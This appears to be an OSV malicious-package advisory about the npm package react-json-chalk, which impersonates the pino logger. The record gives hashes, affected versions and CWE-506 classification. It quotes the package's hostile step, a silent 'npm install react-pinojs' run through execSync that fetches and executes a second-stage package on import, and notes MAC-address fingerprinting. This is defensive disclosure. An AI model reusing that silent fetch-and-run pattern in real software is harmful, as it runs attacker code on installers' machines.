{"id":"MAL-2026-4792","summary":"Malicious code in react-json-chalk (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77)\nThe package is published as `react-json-chalk` but its `main` entry (`pino.js`) impersonates the pino logger (homepage `https://getpino.io`, bundled pino source tree, misappropriated description). On `require('react-json-chalk')`, `pino.js` immediately loads `lib/writer.js`, which at module top level tries `require('react-pinojs')` and, if absent, executes `child_process.execSync(\"npm install react-pinojs --no-warnings --no-save --no-progress --loglevel silent\")` and then `require('../../react-pinojs/pino.js')`. The flags suppress install output and avoid persisting the dependency in package.json, so consumers get no visible signal that a second package was fetched. The fetched dependency is unpinned, fully controlled by whoever publishes `react-pinojs`, and its code runs as part of the require() of this package — arbitrary attacker code on the installer's machine on every import. The same `lib/writer.js` defines `getMacAddress()` which enumerates non-internal IPv4 interface MAC addresses, consistent with host fingerprinting handed off to the second stage. The package name/contents mismatch (logger source tree under an unrelated name) is also a namespace-abuse / pino-impersonation pattern.\n","modified":"2026-06-12T20:01:55.701582873Z","published":"2026-05-26T08:46:33Z","database_specific":{"malicious-packages-origins":[{"versions":["13.4.4"],"id":"IN-MAL-2026-004875","import_time":"2026-05-26T09:17:32.746004914Z","modified_time":"2026-05-26T08:46:33Z","source":"amazon-inspector","sha256":"c3411327be0927b7a726464d2bd9a590ff4ca61bc08e9170e4c0e482dc18dac2"},{"import_time":"2026-06-12T19:43:35.084546687Z","id":"IN-MAL-2026-005803","versions":["13.4.6"],"modified_time":"2026-06-12T19:02:15Z","source":"amazon-inspector","sha256":"1a2b0f9e236c71a3da2c36dd19a90a0a3e096503e79754d25ce2a13eb5d72d77"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-json-chalk/v/13.4.4"},{"type":"PACKAGE","url":"https://www.npmjs.com/package/react-json-chalk/v/13.4.6"}],"affected":[{"package":{"name":"react-json-chalk","ecosystem":"npm","purl":"pkg:npm/react-json-chalk"},"versions":["13.4.4","13.4.6"],"database_specific":{"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/react-json-chalk/MAL-2026-4792.json","indicators":{"package_integrity":[{"hashes":{"sha512_sri":"sha512-oos+FlJaUor3f0YgPAwsmL5gu2ba8WcmyDcObhNNH250f40/6SznsPt4RF5Uc2NRWKKrLpb3zWkWRyluWtXHzQ==","sha1":"724a5212fe4047aca98aa934b3032af19109a35d"},"filename":"react-json-chalk-13.4.4.tgz"}],"evidence_files":[{"path":"lib/writer.js","tlsh":"05318bd78245a278f3b06aa10e5fa0d1b186e12521507dd83ffc84c367ab4e04ed4fd6","sha256":"1ab7958719307e09d349a855f54b59c7e5fe94d2f00b05440e2669b702514c7d"},{"path":"package.json","tlsh":"dc018925ce785da308ec248548290252aa60ed6b584cfd5973d7a32c0f4e5bf68be1ad","sha256":"9b2a5f6bbbfa55f7db60f3e83edf0a71ddf98c5a2830aedcb35af2bd7a9b338e"}]},"cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"},{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["actran@amazon.com","inspector-research@amazon.com"],"type":"FINDER"}]}